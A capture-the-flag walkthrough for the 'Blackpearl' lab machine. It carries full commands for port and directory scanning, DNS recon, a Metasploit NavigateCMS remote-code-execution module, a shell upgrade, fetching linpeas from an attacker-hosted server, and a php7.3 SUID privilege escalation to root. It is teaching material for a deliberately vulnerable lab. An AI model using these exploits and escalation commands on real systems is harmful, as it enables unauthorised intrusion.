BabsAfter turning on our Blackpearl machine, We log in with the details:
Username: root
Password: tcm
To get our IP address, we input the command:
dhclient
Then input the command:
ifconfig
Now that our IP address has been gotten, we go to our kali machine and ping the blackpearl machine in other to confirm that they can communicate with each other.
Use the command:
ping 192.168.158.129 -c3
NB- Remember to change the IP address to your Blackpearl"s IP address.
From the image above, we can see that they are both able to communicate, so next we run an NMAP scan using the command:
nmap -p- -A 192.168.158.129
From the image above, we can see that 3 ports are open, including port 80 so we try to visit the default webpage using the IP address of the machine.
So from our firefox browser we visit the webpage *"192.168.158.129"
*
Right click and click on view page source
From the view page source we found something written as alek@blackpearl.tcm as seen from the below, so we would note that down somewhere.
I couldn't find anything else from the page so my next step now is to try to find hidden directories on the page using ffuf.
Use the command:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.158.129/FUZZ
So we found an hidden directory called secret as seen below
So we move back to our browser and visit the webpage:
192.168.158.129/secret
After visiting that page, we got a file, downloaded it, opened it and it was of no help.
From our opened ports we remember that port 53 for DNS is open so now we try to do some recon on it.
Use the command:
dnsrecon -r 127.0.0.0/24 -n 192.168.182.148
NB- After the "-n" input your blackpearl machine's IP address
So it found that there is dns pointer record to blackpearl.tcm, remember before that we found alek@blackpearl.tcm.
So now we need to go and add that to our DNS host.
Use the command:
nano /etc/hosts
Now input the IP address of your blackpearl machine and the domain name blackpearl.tcm as seen in the image above, save and exit.
Now on your browser, visit the page:
http://blackpearl.tcm
So after much enumerations I decided to search the blackpearl.tcm for hidden directories using the command:
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://blackpearl.tcm/FUZZ
As seen from the image above, a hidden directory of navigate was found.
So now we navigate to navigate (pun intended lol)
On your web browser visit the page:
http://blackpearl.tcm/navigate/
A navigatecms web page was displayed, So I searched online for navigate cms exploit.
Click on the option found above.
The description fits the version of navigate we are trying to exploit.
To use this we have to turn on metasploit on our kali and to turn it on, use the command:
msfconsole
Use the command as seen from the image below
So copy " use exploit/multi/http/navigate_cms_rce " and paste on your msfconsole.
Input the command:
options
Now we need to set the rhosts and vhost.
Input the command:
set rhosts 192.168.182.148
and
set vhost blackpearl.tcm
Input the command *options * again to confirm.
Now input the command:
run
A shell has been popped.
Input the command:
shell
A shell has been successfully created but it is looking different that what we are used to, because it is supposed to show us a user@something for instance and it's not.
So we need to generate what is known as a tty shell, so we search google for tty shell and click on the result seen below.
I prefer to use python so I need to confirm if python is available on the machine, so in the shell we popped, input the command below to verify if python is present in the machine:
which python
The image above proves that python is present.
So copy the command for python.
Now edit it to the command seen below, because I want to use bash and not sh:
python -c 'import pty; pty.spawn("/bin/bash")'
Now paste the above command in the shell.
Now a proper shell has been popped and we need to do some privilege escalation because we are a low level user.
For this we are going to use linpeas.
I already have linpeas downloaded so I need to open another tab on my kali and host up a web server in the directory that my linpeas is located in.
NB- You can comment below if you do not have linpeas download and I,d show you how, and also a previous write up of mine already covered that.
So after moving to the directory that your linpeas is located, input the following command:
python3 -m http.server 80
Then on your shell tab, input the following command:
wget http://192.168.182.129/linpeas.sh linpeas.sh
Linpeas has been successfully airdropped.
Input the command below to confirm:
ls
Now to be able to run linpeas, input the command:
chmod +x linpeas.sh
and run it using the command:
./linpeas.sh
When looking through linpeas, we majorly focus on anything with the colour red or yellow.
For this particular box, we are majorly focusing on the s we can see highlighted in the image above.
Now if you are familiar with permissions, you'd know we are supposed to have just r-w-x which stands for read, write and execute respectively.
But in the space permission for root we are seeing S which means we can run the binary as root and abuse the feature.
Input the command below to see all the permissions we can run as root and abuse in a much cleaner setting:
find / -type f -perm -4000 2>/dev/null
Now visit the website gtfobins on your browser
Select SUID
Scroll down and then select php because that is the only option we have that's present from the permissions we are allowed to run as root.
After clicking on php, scroll down and look for suid.
Now we are only going to copy the command highlighted in the image below, because we need called out the binary specifically because it is not just php, ours is php 7.3 and we need to involve the file path.
So input the command:
/usr/bin/php7.3 -r "pcntl_exec('/bin/sh', ['-p']);"
Once that has been executed, input the command:
whoami
As you can see, we have become ROOT!
